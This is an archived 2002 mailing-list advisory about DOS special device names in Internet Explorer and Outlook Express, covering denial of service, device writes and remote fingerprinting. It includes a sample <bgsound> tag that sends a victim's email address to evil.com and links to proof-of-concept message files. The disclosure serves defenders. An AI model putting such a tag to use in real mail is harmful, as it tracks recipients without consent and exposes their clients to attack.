dH team & SECURITY.NNOV: special device access, information leakage and DoS in Outlook Express

From: ERRor (errorat_private)
Date: Wed May 15 2002 - 04:11:32 PDT

Next message: Cisco Systems Product Security Incident Response Team: "Cisco Security Advisory: Transparent Cache Engine and Content Engine TCP Relay Vulnerability"

Previous message: SUZUKI Yasuhiro: "swatch bug in throttle"
Next in thread: Chad Loder: "Re: dH team & SECURITY.NNOV: special device access, information leakage and DoS in Outlook Express"
Reply: Chad Loder: "Re: dH team & SECURITY.NNOV: special device access, information leakage and DoS in Outlook Express"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Original version of this advisory:
http://www.security.nnov.ru/advisories/msiedos.asp

Title:                     Special device access and DoS in Microsoft Internet
                              Exporer/Outlook Express/Outlook
Authors:              ERRor, 3APA3A
Date:                     May, 14 2002
Affected:              Internet Explorer 6.0
Vendor:                 Microsoft
Risk:                      Average to high
Remote:                 Yes
Exploitable:           Yes
Vendor notified:   April, 24 2002

Intro:

All  versions  of  Windows have a reserved filenames referred to special
devices such as prn, aux, nul, etc also called DOS devices. Filename for
special  device may have any directory path and any extension after dot.
For  example  c:\temp\prn.tmp  refers to prn device. Same API is used to
access  special device and regular files. Unauthorized access to special
device may be significant security issue causing different results: from
Denial of Service against running program or service to hardware failure
or secure data compromise.

Problem:

ERRor  discovered  that <BGSOUND> tag in conjunction with special device
name  causes DoS against Internet Explorer or Outlook Express regardless
of  security zone settings. For Outlook Express it's untrivial to remove
malcrafted  message  without losing message folder.

During investigation of this issue it was found by 3APA3A and ERRor that
using <IFRAME> tag it's possible to send any data to special device.

Another  problem  is  that  regardless  of security zone settings source
specified in <BGSOUND> tag is always downloaded. It makes it possible to
fingerprint  remote  client  by his e-mail using something like

<bgsound src="victimat_private">http://evil.com/registerme?email=victimat_private">

Remote client fingerprint problem is discussed in [4].


Exploitation:

You  can  use  [2] to test DoS against Outlook Express via <BGSOUND>. 
[3] will  print  text  line  on  a  text printer, attached to LPT1, (in Outlook
Express 6.0) via <IFRAME>

1. Special device access and DoS in Outlook Express
   http://www.security.nnov.ru/search/news.asp?binid=2010
2. Outlook Express Special Device DoS POC
   http://www.security.nnov.ru/files/iedos/dos.eml
3. Outlook Express Special Device access POC
   http://www.security.nnov.ru/files/iedos/print.eml
4. Security risks assoticated with using e-mail.
   http://www.security.nnov.ru/articles/uninet/

Vendor:

Microsoft was informed on April, 24  2002. No feedback from vendor since
April, 25.

Next message: Cisco Systems Product Security Incident Response Team: "Cisco Security Advisory: Transparent Cache Engine and Content Engine TCP Relay Vulnerability"
Previous message: SUZUKI Yasuhiro: "swatch bug in throttle"
Next in thread: Chad Loder: "Re: dH team & SECURITY.NNOV: special device access, information leakage and DoS in Outlook Express"
Reply: Chad Loder: "Re: dH team & SECURITY.NNOV: special device access, information leakage and DoS in Outlook Express"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed May 15 2002 - 10:26:32 PDT